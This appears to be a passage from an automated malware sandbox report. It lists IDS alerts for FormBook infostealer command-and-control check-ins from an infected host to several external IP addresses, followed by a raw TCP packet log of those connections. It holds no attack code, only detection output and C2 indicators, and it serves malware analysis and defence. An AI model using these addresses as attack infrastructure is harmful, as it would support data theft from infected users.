2024-11-24T08:29:56.621966+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49994	103.224.182.242	80	TCP
2024-11-24T08:29:59.182645+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50000	103.224.182.242	80	TCP
2024-11-24T08:30:02.028987+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	50003	103.224.182.242	80	TCP
2024-11-24T08:30:09.184810+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50004	149.88.81.190	80	TCP
2024-11-24T08:30:11.872271+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50005	149.88.81.190	80	TCP
2024-11-24T08:30:14.543978+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50006	149.88.81.190	80	TCP
2024-11-24T08:30:37.676799+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	50007	149.88.81.190	80	TCP
2024-11-24T08:30:45.055638+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50008	101.35.209.183	80	TCP
2024-11-24T08:30:47.683511+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50009	101.35.209.183	80	TCP
2024-11-24T08:30:50.416205+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50010	101.35.209.183	80	TCP
2024-11-24T08:30:53.157101+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	50011	101.35.209.183	80	TCP
2024-11-24T08:31:00.528569+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50012	38.47.232.202	80	TCP
2024-11-24T08:31:03.338903+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50013	38.47.232.202	80	TCP
2024-11-24T08:31:06.169311+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50015	38.47.232.202	80	TCP
2024-11-24T08:31:08.890514+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	50016	38.47.232.202	80	TCP
2024-11-24T08:31:16.001908+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50017	208.91.197.39	80	TCP
2024-11-24T08:31:18.678256+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50018	208.91.197.39	80	TCP
2024-11-24T08:31:21.447020+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50019	208.91.197.39	80	TCP
2024-11-24T08:31:24.777385+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	50020	208.91.197.39	80	TCP
2024-11-24T08:31:32.076608+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50021	43.205.198.29	80	TCP
2024-11-24T08:31:34.744024+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50022	43.205.198.29	80	TCP
2024-11-24T08:31:37.466203+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50023	43.205.198.29	80	TCP
2024-11-24T08:31:40.136142+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	50024	43.205.198.29	80	TCP
2024-11-24T08:31:47.138016+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50025	104.21.40.167	80	TCP
2024-11-24T08:31:49.810768+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50026	104.21.40.167	80	TCP
2024-11-24T08:31:52.481857+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50027	104.21.40.167	80	TCP
2024-11-24T08:31:55.588246+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	50028	104.21.40.167	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2024 08:28:32.570307016 CET	49790	80	192.168.2.6	202.92.5.23
Nov 24, 2024 08:28:32.689877033 CET	80	49790	202.92.5.23	192.168.2.6
Nov 24, 2024 08:28:32.691994905 CET	49790	80	192.168.2.6	202.92.5.23
Nov 24, 2024 08:28:32.702631950 CET	49790	80	192.168.2.6	202.92.5.23
Nov 24, 2024 08:28:32.822118044 CET	80	49790	202.92.5.23	192.168.2.6
Nov 24, 2024 08:28:34.269078016 CET	80	49790	202.92.5.23	192.168.2.6
Nov 24, 2024 08:28:34.269093037 CET	80	49790	202.92.5.23	192.168.2.6
Nov 24, 2024 08:28:34.269105911 CET	80	49790	202.92.5.23	192.168.2.6
Nov 24, 2024 08:28:34.269221067 CET	49790	80	192.168.2.6	202.92.5.23
Nov 24, 2024 08:28:34.269249916 CET	49790	80	192.168.2.6	202.92.5.23
Nov 24, 2024 08:28:34.272656918 CET	49790	80	192.168.2.6	202.92.5.23
Nov 24, 2024 08:28:34.392200947 CET	80	49790	202.92.5.23	192.168.2.6
Nov 24, 2024 08:28:50.081240892 CET	49830	80	192.168.2.6	13.248.169.48
Nov 24, 2024 08:28:50.200809956 CET	80	49830	13.248.169.48	192.168.2.6
Nov 24, 2024 08:28:50.200906038 CET	49830	80	192.168.2.6	13.248.169.48
Nov 24, 2024 08:28:50.218195915 CET	49830	80	192.168.2.6	13.248.169.48
Nov 24, 2024 08:28:50.338340044 CET	80	49830	13.248.169.48	192.168.2.6
Nov 24, 2024 08:28:51.346024036 CET	80	49830	13.248.169.48	192.168.2.6
Nov 24, 2024 08:28:51.346122026 CET	49830	80	192.168.2.6	13.248.169.48
Nov 24, 2024 08:28:51.731190920 CET	49830	80	192.168.2.6	13.248.169.48
Nov 24, 2024 08:28:51.851807117 CET	80	49830	13.248.169.48	192.168.2.6
Nov 24, 2024 08:28:52.750655890 CET	49836	80	192.168.2.6	13.248.169.48
Nov 24, 2024 08:28:52.870240927 CET	80	49836	13.248.169.48	192.168.2.6
Nov 24, 2024 08:28:52.872181892 CET	49836	80	192.168.2.6	13.248.169.48
Nov 24, 2024 08:28:52.887691021 CET	49836	80	192.168.2.6	13.248.169.48
Nov 24, 2024 08:28:53.007488012 CET	80	49836	13.248.169.48	192.168.2.6
Nov 24, 2024 08:28:54.094357967 CET	80	49836	13.248.169.48	192.168.2.6
Nov 24, 2024 08:28:54.094567060 CET	49836	80	192.168.2.6	13.248.169.48
Nov 24, 2024 08:28:54.403086901 CET	49836	80	192.168.2.6	13.248.169.48
Nov 24, 2024 08:28:54.523005962 CET	80	49836	13.248.169.48	192.168.2.6
Nov 24, 2024 08:28:55.422986031 CET	49843	80	192.168.2.6	13.248.169.48
Nov 24, 2024 08:28:55.542506933 CET	80	49843	13.248.169.48	192.168.2.6
Nov 24, 2024 08:28:55.542648077 CET	49843	80	192.168.2.6	13.248.169.48
Nov 24, 2024 08:28:55.563256025 CET	49843	80	192.168.2.6	13.248.169.48
Nov 24, 2024 08:28:55.682874918 CET	80	49843	13.248.169.48	192.168.2.6
Nov 24, 2024 08:28:55.682944059 CET	80	49843	13.248.169.48	192.168.2.6
Nov 24, 2024 08:28:56.733314991 CET	80	49843	13.248.169.48	192.168.2.6
Nov 24, 2024 08:28:56.733422995 CET	49843	80	192.168.2.6	13.248.169.48
Nov 24, 2024 08:28:57.075113058 CET	49843	80	192.168.2.6	13.248.169.48
Nov 24, 2024 08:28:57.194636106 CET	80	49843	13.248.169.48	192.168.2.6
Nov 24, 2024 08:28:58.094221115 CET	49850	80	192.168.2.6	13.248.169.48
Nov 24, 2024 08:28:58.213834047 CET	80	49850	13.248.169.48	192.168.2.6
Nov 24, 2024 08:28:58.214024067 CET	49850	80	192.168.2.6	13.248.169.48
Nov 24, 2024 08:28:58.223838091 CET	49850	80	192.168.2.6	13.248.169.48
Nov 24, 2024 08:28:58.343467951 CET	80	49850	13.248.169.48	192.168.2.6
Nov 24, 2024 08:28:59.360490084 CET	80	49850	13.248.169.48	192.168.2.6
Nov 24, 2024 08:28:59.360805988 CET	80	49850	13.248.169.48	192.168.2.6
Nov 24, 2024 08:28:59.360886097 CET	49850	80	192.168.2.6	13.248.169.48
Nov 24, 2024 08:28:59.364495039 CET	49850	80	192.168.2.6	13.248.169.48
Nov 24, 2024 08:28:59.484376907 CET	80	49850	13.248.169.48	192.168.2.6
Nov 24, 2024 08:29:04.932074070 CET	49866	80	192.168.2.6	209.74.77.109
Nov 24, 2024 08:29:05.051769018 CET	80	49866	209.74.77.109	192.168.2.6
Nov 24, 2024 08:29:05.051960945 CET	49866	80	192.168.2.6	209.74.77.109
Nov 24, 2024 08:29:05.067977905 CET	49866	80	192.168.2.6	209.74.77.109
Nov 24, 2024 08:29:05.187524080 CET	80	49866	209.74.77.109	192.168.2.6
Nov 24, 2024 08:29:06.321594954 CET	80	49866	209.74.77.109	192.168.2.6
Nov 24, 2024 08:29:06.321645021 CET	80	49866	209.74.77.109	192.168.2.6
Nov 24, 2024 08:29:06.321809053 CET	49866	80	192.168.2.6	209.74.77.109
Nov 24, 2024 08:29:06.575120926 CET	49866	80	192.168.2.6	209.74.77.109
Nov 24, 2024 08:29:07.595526934 CET	49874	80	192.168.2.6	209.74.77.109
Nov 24, 2024 08:29:07.715300083 CET	80	49874	209.74.77.109	192.168.2.6
Nov 24, 2024 08:29:07.715483904 CET	49874	80	192.168.2.6	209.74.77.109
Nov 24, 2024 08:29:07.731071949 CET	49874	80	192.168.2.6	209.74.77.109
Nov 24, 2024 08:29:07.850651026 CET	80	49874	209.74.77.109	192.168.2.6
Nov 24, 2024 08:29:09.038719893 CET	80	49874	209.74.77.109	192.168.2.6
Nov 24, 2024 08:29:09.039021015 CET	80	49874	209.74.77.109	192.168.2.6
Nov 24, 2024 08:29:09.039119005 CET	49874	80	192.168.2.6	209.74.77.109
Nov 24, 2024 08:29:09.247087002 CET	49874	80	192.168.2.6	209.74.77.109
Nov 24, 2024 08:29:10.266160011 CET	49881	80	192.168.2.6	209.74.77.109
Nov 24, 2024 08:29:10.385905981 CET	80	49881	209.74.77.109	192.168.2.6
Nov 24, 2024 08:29:10.386008024 CET	49881	80	192.168.2.6	209.74.77.109
Nov 24, 2024 08:29:10.405950069 CET	49881	80	192.168.2.6	209.74.77.109
Nov 24, 2024 08:29:10.525854111 CET	80	49881	209.74.77.109	192.168.2.6
Nov 24, 2024 08:29:10.525871992 CET	80	49881	209.74.77.109	192.168.2.6
Nov 24, 2024 08:29:11.704103947 CET	80	49881	209.74.77.109	192.168.2.6
Nov 24, 2024 08:29:11.704227924 CET	80	49881	209.74.77.109	192.168.2.6
Nov 24, 2024 08:29:11.704289913 CET	49881	80	192.168.2.6	209.74.77.109
Nov 24, 2024 08:29:11.918751955 CET	49881	80	192.168.2.6	209.74.77.109
Nov 24, 2024 08:29:12.938569069 CET	49888	80	192.168.2.6	209.74.77.109
Nov 24, 2024 08:29:13.058404922 CET	80	49888	209.74.77.109	192.168.2.6
Nov 24, 2024 08:29:13.060101986 CET	49888	80	192.168.2.6	209.74.77.109
Nov 24, 2024 08:29:13.070003986 CET	49888	80	192.168.2.6	209.74.77.109
Nov 24, 2024 08:29:13.189542055 CET	80	49888	209.74.77.109	192.168.2.6
Nov 24, 2024 08:29:14.379695892 CET	80	49888	209.74.77.109	192.168.2.6
Nov 24, 2024 08:29:14.379741907 CET	80	49888	209.74.77.109	192.168.2.6
Nov 24, 2024 08:29:14.380014896 CET	49888	80	192.168.2.6	209.74.77.109
Nov 24, 2024 08:29:14.382847071 CET	49888	80	192.168.2.6	209.74.77.109
Nov 24, 2024 08:29:14.502366066 CET	80	49888	209.74.77.109	192.168.2.6
Nov 24, 2024 08:29:19.983609915 CET	49904	80	192.168.2.6	23.225.160.132
Nov 24, 2024 08:29:20.103111982 CET	80	49904	23.225.160.132	192.168.2.6
Nov 24, 2024 08:29:20.103396893 CET	49904	80	192.168.2.6	23.225.160.132
Nov 24, 2024 08:29:20.137379885 CET	49904	80	192.168.2.6	23.225.160.132
Nov 24, 2024 08:29:20.256865978 CET	80	49904	23.225.160.132	192.168.2.6
Nov 24, 2024 08:29:21.255311012 CET	80	49904	23.225.160.132	192.168.2.6
Nov 24, 2024 08:29:21.309499979 CET	49904	80	192.168.2.6	23.225.160.132
Nov 24, 2024 08:29:21.326553106 CET	80	49904	23.225.160.132	192.168.2.6
Nov 24, 2024 08:29:21.326668024 CET	49904	80	192.168.2.6	23.225.160.132
Nov 24, 2024 08:29:21.653203011 CET	49904	80	192.168.2.6	23.225.160.132
Nov 24, 2024 08:29:22.728264093 CET	49911	80	192.168.2.6	23.225.160.132
Nov 24, 2024 08:29:22.847805023 CET	80	49911	23.225.160.132	192.168.2.6
Nov 24, 2024 08:29:22.847891092 CET	49911	80	192.168.2.6	23.225.160.132
Nov 24, 2024 08:29:22.880951881 CET	49911	80	192.168.2.6	23.225.160.132
Nov 24, 2024 08:29:23.000516891 CET	80	49911	23.225.160.132	192.168.2.6
Nov 24, 2024 08:29:24.090465069 CET	80	49911	23.225.160.132	192.168.2.6
Nov 24, 2024 08:29:24.137476921 CET	49911	80	192.168.2.6	23.225.160.132
Nov 24, 2024 08:29:24.160562992 CET	80	49911	23.225.160.132	192.168.2.6
Nov 24, 2024 08:29:24.160689116 CET	49911	80	192.168.2.6	23.225.160.132
Nov 24, 2024 08:29:24.388041019 CET	49911	80	192.168.2.6	23.225.160.132
Nov 24, 2024 08:29:25.407205105 CET	49920	80	192.168.2.6	23.225.160.132
Nov 24, 2024 08:29:25.526787996 CET	80	49920	23.225.160.132	192.168.2.6
Nov 24, 2024 08:29:25.528150082 CET	49920	80	192.168.2.6	23.225.160.132
Nov 24, 2024 08:29:25.546107054 CET	49920	80	192.168.2.6	23.225.160.132
Nov 24, 2024 08:29:25.665735006 CET	80	49920	23.225.160.132	192.168.2.6
Nov 24, 2024 08:29:25.665757895 CET	80	49920	23.225.160.132	192.168.2.6
Nov 24, 2024 08:29:26.728163958 CET	80	49920	23.225.160.132	192.168.2.6
Nov 24, 2024 08:29:26.778070927 CET	49920	80	192.168.2.6	23.225.160.132
Nov 24, 2024 08:29:26.801656008 CET	80	49920	23.225.160.132	192.168.2.6
Nov 24, 2024 08:29:26.801711082 CET	49920	80	192.168.2.6	23.225.160.132
Nov 24, 2024 08:29:27.059531927 CET	49920	80	192.168.2.6	23.225.160.132
Nov 24, 2024 08:29:28.080023050 CET	49927	80	192.168.2.6	23.225.160.132
Nov 24, 2024 08:29:28.199990034 CET	80	49927	23.225.160.132	192.168.2.6
Nov 24, 2024 08:29:28.200100899 CET	49927	80	192.168.2.6	23.225.160.132
Nov 24, 2024 08:29:28.215060949 CET	49927	80	192.168.2.6	23.225.160.132
Nov 24, 2024 08:29:28.334573984 CET	80	49927	23.225.160.132	192.168.2.6
Nov 24, 2024 08:29:29.399141073 CET	80	49927	23.225.160.132	192.168.2.6
Nov 24, 2024 08:29:29.450158119 CET	49927	80	192.168.2.6	23.225.160.132
Nov 24, 2024 08:29:29.471522093 CET	80	49927	23.225.160.132	192.168.2.6
Nov 24, 2024 08:29:29.476385117 CET	49927	80	192.168.2.6	23.225.160.132
Nov 24, 2024 08:29:29.477243900 CET	49927	80	192.168.2.6	23.225.160.132
Nov 24, 2024 08:29:29.596652031 CET	80	49927	23.225.160.132	192.168.2.6
Nov 24, 2024 08:29:35.012257099 CET	49943	80	192.168.2.6	46.30.211.38
Nov 24, 2024 08:29:35.131864071 CET	80	49943	46.30.211.38	192.168.2.6
Nov 24, 2024 08:29:35.131961107 CET	49943	80	192.168.2.6	46.30.211.38
Nov 24, 2024 08:29:35.151686907 CET	49943	80	192.168.2.6	46.30.211.38
Nov 24, 2024 08:29:35.271295071 CET	80	49943	46.30.211.38	192.168.2.6
Nov 24, 2024 08:29:36.487171888 CET	80	49943	46.30.211.38	192.168.2.6
Nov 24, 2024 08:29:36.487318039 CET	80	49943	46.30.211.38	192.168.2.6
Nov 24, 2024 08:29:36.487360954 CET	49943	80	192.168.2.6	46.30.211.38
Nov 24, 2024 08:29:36.653326035 CET	49943	80	192.168.2.6	46.30.211.38
Nov 24, 2024 08:29:37.706109047 CET	49949	80	192.168.2.6	46.30.211.38
Nov 24, 2024 08:29:37.825679064 CET	80	49949	46.30.211.38	192.168.2.6
Nov 24, 2024 08:29:37.826535940 CET	49949	80	192.168.2.6	46.30.211.38
Nov 24, 2024 08:29:37.846282959 CET	49949	80	192.168.2.6	46.30.211.38
Nov 24, 2024 08:29:37.965804100 CET	80	49949	46.30.211.38	192.168.2.6
Nov 24, 2024 08:29:39.144932985 CET	80	49949	46.30.211.38	192.168.2.6
Nov 24, 2024 08:29:39.144953966 CET	80	49949	46.30.211.38	192.168.2.6
Nov 24, 2024 08:29:39.145082951 CET	49949	80	192.168.2.6	46.30.211.38
Nov 24, 2024 08:29:39.356312037 CET	49949	80	192.168.2.6	46.30.211.38
Nov 24, 2024 08:29:40.386503935 CET	49955	80	192.168.2.6	46.30.211.38
Nov 24, 2024 08:29:40.506679058 CET	80	49955	46.30.211.38	192.168.2.6
Nov 24, 2024 08:29:40.506784916 CET	49955	80	192.168.2.6	46.30.211.38
Nov 24, 2024 08:29:40.530983925 CET	49955	80	192.168.2.6	46.30.211.38
Nov 24, 2024 08:29:40.650697947 CET	80	49955	46.30.211.38	192.168.2.6
Nov 24, 2024 08:29:40.650708914 CET	80	49955	46.30.211.38	192.168.2.6
Nov 24, 2024 08:29:41.861560106 CET	80	49955	46.30.211.38	192.168.2.6
Nov 24, 2024 08:29:41.861607075 CET	80	49955	46.30.211.38	192.168.2.6
Nov 24, 2024 08:29:41.864243031 CET	49955	80	192.168.2.6	46.30.211.38
Nov 24, 2024 08:29:42.043874979 CET	49955	80	192.168.2.6	46.30.211.38
Nov 24, 2024 08:29:43.116038084 CET	49962	80	192.168.2.6	46.30.211.38
Nov 24, 2024 08:29:43.235622883 CET	80	49962	46.30.211.38	192.168.2.6
Nov 24, 2024 08:29:43.242413044 CET	49962	80	192.168.2.6	46.30.211.38
Nov 24, 2024 08:29:43.262352943 CET	49962	80	192.168.2.6	46.30.211.38
Nov 24, 2024 08:29:43.381964922 CET	80	49962	46.30.211.38	192.168.2.6
Nov 24, 2024 08:29:44.504693985 CET	80	49962	46.30.211.38	192.168.2.6
Nov 24, 2024 08:29:44.504869938 CET	80	49962	46.30.211.38	192.168.2.6
Nov 24, 2024 08:29:44.504946947 CET	49962	80	192.168.2.6	46.30.211.38
Nov 24, 2024 08:29:44.508771896 CET	49962	80	192.168.2.6	46.30.211.38
Nov 24, 2024 08:29:44.628217936 CET	80	49962	46.30.211.38	192.168.2.6
Nov 24, 2024 08:29:52.298429966 CET	49987	80	192.168.2.6	103.224.182.242
Nov 24, 2024 08:29:52.418307066 CET	80	49987	103.224.182.242	192.168.2.6
Nov 24, 2024 08:29:52.418428898 CET	49987	80	192.168.2.6	103.224.182.242
Nov 24, 2024 08:29:52.439549923 CET	49987	80	192.168.2.6	103.224.182.242
Nov 24, 2024 08:29:52.559134007 CET	80	49987	103.224.182.242	192.168.2.6
Nov 24, 2024 08:29:53.725788116 CET	80	49987	103.224.182.242	192.168.2.6
Nov 24, 2024 08:29:53.725828886 CET	80	49987	103.224.182.242	192.168.2.6
Nov 24, 2024 08:29:53.725965023 CET	49987	80	192.168.2.6	103.224.182.242
Nov 24, 2024 08:29:53.950531960 CET	49987	80	192.168.2.6	103.224.182.242
Nov 24, 2024 08:29:54.972189903 CET	49994	80	192.168.2.6	103.224.182.242
Nov 24, 2024 08:29:55.092190981 CET	80	49994	103.224.182.242	192.168.2.6
Nov 24, 2024 08:29:55.092351913 CET	49994	80	192.168.2.6	103.224.182.242
Nov 24, 2024 08:29:55.108361959 CET	49994	80	192.168.2.6	103.224.182.242
Nov 24, 2024 08:29:55.228051901 CET	80	49994	103.224.182.242	192.168.2.6
Nov 24, 2024 08:29:56.621965885 CET	49994	80	192.168.2.6	103.224.182.242
Nov 24, 2024 08:29:56.783418894 CET	80	49994	103.224.182.242	192.168.2.6
Nov 24, 2024 08:29:57.644220114 CET	50000	80	192.168.2.6	103.224.182.242
Nov 24, 2024 08:29:57.763849020 CET	80	50000	103.224.182.242	192.168.2.6
Nov 24, 2024 08:29:57.764028072 CET	50000	80	192.168.2.6	103.224.182.242
Nov 24, 2024 08:29:57.780669928 CET	50000	80	192.168.2.6	103.224.182.242
Nov 24, 2024 08:29:57.900254965 CET	80	50000	103.224.182.242	192.168.2.6
Nov 24, 2024 08:29:57.900331020 CET	80	50000	103.224.182.242	192.168.2.6
Nov 24, 2024 08:29:59.099586964 CET	80	49994	103.224.182.242	192.168.2.6
Nov 24, 2024 08:29:59.099644899 CET	49994	80	192.168.2.6	103.224.182.242
Nov 24, 2024 08:29:59.182518959 CET	80	50000	103.224.182.242	192.168.2.6
Nov 24, 2024 08:29:59.182591915 CET	80	50000	103.224.182.242	192.168.2.6
Nov 24, 2024 08:29:59.182645082 CET	50000	80	192.168.2.6	103.224.182.242
Nov 24, 2024 08:29:59.293988943 CET	50000	80	192.168.2.6	103.224.182.242
Nov 24, 2024 08:30:00.314071894 CET	50003	80	192.168.2.6	103.224.182.242
Nov 24, 2024 08:30:00.433617115 CET	80	50003	103.224.182.242	192.168.2.6
Nov 24, 2024 08:30:00.433707952 CET	50003	80	192.168.2.6	103.224.182.242
Nov 24, 2024 08:30:00.447290897 CET	50003	80	192.168.2.6	103.224.182.242
Nov 24, 2024 08:30:00.566965103 CET	80	50003	103.224.182.242	192.168.2.6
Nov 24, 2024 08:30:02.028774023 CET	80	50003	103.224.182.242	192.168.2.6
Nov 24, 2024 08:30:02.028834105 CET	80	50003	103.224.182.242	192.168.2.6
Nov 24, 2024 08:30:02.028847933 CET	80	50003	103.224.182.242	192.168.2.6
Nov 24, 2024 08:30:02.028986931 CET	50003	80	192.168.2.6	103.224.182.242
Nov 24, 2024 08:30:02.032227039 CET	50003	80	192.168.2.6	103.224.182.242
Nov 24, 2024 08:30:02.151742935 CET	80	50003	103.224.182.242	192.168.2.6
Nov 24, 2024 08:30:07.532288074 CET	50004	80	192.168.2.6	149.88.81.190
Nov 24, 2024 08:30:07.651844025 CET	80	50004	149.88.81.190	192.168.2.6
Nov 24, 2024 08:30:07.652121067 CET	50004	80	192.168.2.6	149.88.81.190
Nov 24, 2024 08:30:07.668456078 CET	50004	80	192.168.2.6	149.88.81.190
Nov 24, 2024 08:30:07.788094997 CET	80	50004	149.88.81.190	192.168.2.6
Nov 24, 2024 08:30:09.184809923 CET	50004	80	192.168.2.6	149.88.81.190
Nov 24, 2024 08:30:09.347532034 CET	80	50004	149.88.81.190	192.168.2.6
Nov 24, 2024 08:30:10.204278946 CET	50005	80	192.168.2.6	149.88.81.190
Nov 24, 2024 08:30:10.323832989 CET	80	50005	149.88.81.190	192.168.2.6
Nov 24, 2024 08:30:10.323930979 CET	50005	80	192.168.2.6	149.88.81.190
Nov 24, 2024 08:30:10.365022898 CET	50005	80	192.168.2.6	149.88.81.190
Nov 24, 2024 08:30:10.484769106 CET	80	50005	149.88.81.190	192.168.2.6
Nov 24, 2024 08:30:11.872271061 CET	50005	80	192.168.2.6	149.88.81.190
Nov 24, 2024 08:30:12.035523891 CET	80	50005	149.88.81.190	192.168.2.6
Nov 24, 2024 08:30:12.893357038 CET	50006	80	192.168.2.6	149.88.81.190
Nov 24, 2024 08:30:13.013036966 CET	80	50006	149.88.81.190	192.168.2.6
Nov 24, 2024 08:30:13.013231993 CET	50006	80	192.168.2.6	149.88.81.190
Nov 24, 2024 08:30:13.030641079 CET	50006	80	192.168.2.6	149.88.81.190
Nov 24, 2024 08:30:13.150269032 CET	80	50006	149.88.81.190	192.168.2.6
Nov 24, 2024 08:30:13.150307894 CET	80	50006	149.88.81.190	192.168.2.6
Nov 24, 2024 08:30:14.543977976 CET	50006	80	192.168.2.6	149.88.81.190
Nov 24, 2024 08:30:14.711592913 CET	80	50006	149.88.81.190	192.168.2.6
Nov 24, 2024 08:30:15.601598978 CET	50007	80	192.168.2.6	149.88.81.190
Nov 24, 2024 08:30:15.721230984 CET	80	50007	149.88.81.190	192.168.2.6
Nov 24, 2024 08:30:15.721509933 CET	50007	80	192.168.2.6	149.88.81.190
Nov 24, 2024 08:30:15.732300997 CET	50007	80	192.168.2.6	149.88.81.190
Nov 24, 2024 08:30:15.852260113 CET	80	50007	149.88.81.190	192.168.2.6
Nov 24, 2024 08:30:29.633347988 CET	80	50004	149.88.81.190	192.168.2.6
Nov 24, 2024 08:30:29.634654045 CET	50004	80	192.168.2.6	149.88.81.190
Nov 24, 2024 08:30:32.217502117 CET	80	50005	149.88.81.190	192.168.2.6
Nov 24, 2024 08:30:32.217957973 CET	50005	80	192.168.2.6	149.88.81.190
Nov 24, 2024 08:30:34.904938936 CET	80	50006	149.88.81.190	192.168.2.6
Nov 24, 2024 08:30:34.905018091 CET	50006	80	192.168.2.6	149.88.81.190
Nov 24, 2024 08:30:37.676537037 CET	80	50007	149.88.81.190	192.168.2.6
Nov 24, 2024 08:30:37.676799059 CET	50007	80	192.168.2.6	149.88.81.190
Nov 24, 2024 08:30:37.678066015 CET	50007	80	192.168.2.6	149.88.81.190
Nov 24, 2024 08:30:37.799451113 CET	80	50007	149.88.81.190	192.168.2.6
Nov 24, 2024 08:30:43.412400007 CET	50008	80	192.168.2.6	101.35.209.183
Nov 24, 2024 08:30:43.531982899 CET	80	50008	101.35.209.183	192.168.2.6
Nov 24, 2024 08:30:43.532104015 CET	50008	80	192.168.2.6	101.35.209.183
Nov 24, 2024 08:30:43.550069094 CET	50008	80	192.168.2.6	101.35.209.183
Nov 24, 2024 08:30:43.669621944 CET	80	50008	101.35.209.183	192.168.2.6
Nov 24, 2024 08:30:45.055460930 CET	80	50008	101.35.209.183	192.168.2.6
Nov 24, 2024 08:30:45.055557013 CET	80	50008	101.35.209.183	192.168.2.6
Nov 24, 2024 08:30:45.055638075 CET	50008	80	192.168.2.6	101.35.209.183
Nov 24, 2024 08:30:45.059773922 CET	50008	80	192.168.2.6	101.35.209.183
Nov 24, 2024 08:30:46.079406023 CET	50009	80	192.168.2.6	101.35.209.183
Nov 24, 2024 08:30:46.199109077 CET	80	50009	101.35.209.183	192.168.2.6
Nov 24, 2024 08:30:46.200548887 CET	50009	80	192.168.2.6	101.35.209.183
Nov 24, 2024 08:30:46.218153954 CET	50009	80	192.168.2.6	101.35.209.183
Nov 24, 2024 08:30:46.339323044 CET	80	50009	101.35.209.183	192.168.2.6
Nov 24, 2024 08:30:47.680855036 CET	80	50009	101.35.209.183	192.168.2.6
Nov 24, 2024 08:30:47.680887938 CET	80	50009	101.35.209.183	192.168.2.6
Nov 24, 2024 08:30:47.683511019 CET	50009	80	192.168.2.6	101.35.209.183
Nov 24, 2024 08:30:47.731743097 CET	50009	80	192.168.2.6	101.35.209.183
Nov 24, 2024 08:30:48.753114939 CET	50010	80	192.168.2.6	101.35.209.183
Nov 24, 2024 08:30:48.872848034 CET	80	50010	101.35.209.183	192.168.2.6
Nov 24, 2024 08:30:48.872972965 CET	50010	80	192.168.2.6	101.35.209.183
Nov 24, 2024 08:30:48.902117014 CET	50010	80	192.168.2.6	101.35.209.183
Nov 24, 2024 08:30:49.021888971 CET	80	50010	101.35.209.183	192.168.2.6
Nov 24, 2024 08:30:49.021935940 CET	80	50010	101.35.209.183	192.168.2.6
Nov 24, 2024 08:30:50.416089058 CET	80	50010	101.35.209.183	192.168.2.6
Nov 24, 2024 08:30:50.416146994 CET	80	50010	101.35.209.183	192.168.2.6
Nov 24, 2024 08:30:50.416204929 CET	50010	80	192.168.2.6	101.35.209.183
Nov 24, 2024 08:30:50.419219017 CET	50010	80	192.168.2.6	101.35.209.183
Nov 24, 2024 08:30:51.438148975 CET	50011	80	192.168.2.6	101.35.209.183
Nov 24, 2024 08:30:51.558037996 CET	80	50011	101.35.209.183	192.168.2.6
Nov 24, 2024 08:30:51.558135986 CET	50011	80	192.168.2.6	101.35.209.183
Nov 24, 2024 08:30:51.568675041 CET	50011	80	192.168.2.6	101.35.209.183
Nov 24, 2024 08:30:51.688369989 CET	80	50011	101.35.209.183	192.168.2.6
Nov 24, 2024 08:30:53.156908989 CET	80	50011	101.35.209.183	192.168.2.6
Nov 24, 2024 08:30:53.156987906 CET	80	50011	101.35.209.183	192.168.2.6
Nov 24, 2024 08:30:53.157100916 CET	50011	80	192.168.2.6	101.35.209.183
Nov 24, 2024 08:30:53.162393093 CET	50011	80	192.168.2.6	101.35.209.183
Nov 24, 2024 08:30:53.281924963 CET	80	50011	101.35.209.183	192.168.2.6
Nov 24, 2024 08:30:58.884721994 CET	50012	80	192.168.2.6	38.47.232.202
Nov 24, 2024 08:30:59.004436016 CET	80	50012	38.47.232.202	192.168.2.6
Nov 24, 2024 08:30:59.004563093 CET	50012	80	192.168.2.6	38.47.232.202
Nov 24, 2024 08:30:59.025260925 CET	50012	80	192.168.2.6	38.47.232.202
Nov 24, 2024 08:30:59.145119905 CET	80	50012	38.47.232.202	192.168.2.6
Nov 24, 2024 08:31:00.528568983 CET	50012	80	192.168.2.6	38.47.232.202
Nov 24, 2024 08:31:00.629570961 CET	80	50012	38.47.232.202	192.168.2.6
Nov 24, 2024 08:31:00.629596949 CET	80	50012	38.47.232.202	192.168.2.6
Nov 24, 2024 08:31:00.629645109 CET	50012	80	192.168.2.6	38.47.232.202
Nov 24, 2024 08:31:00.629681110 CET	50012	80	192.168.2.6	38.47.232.202
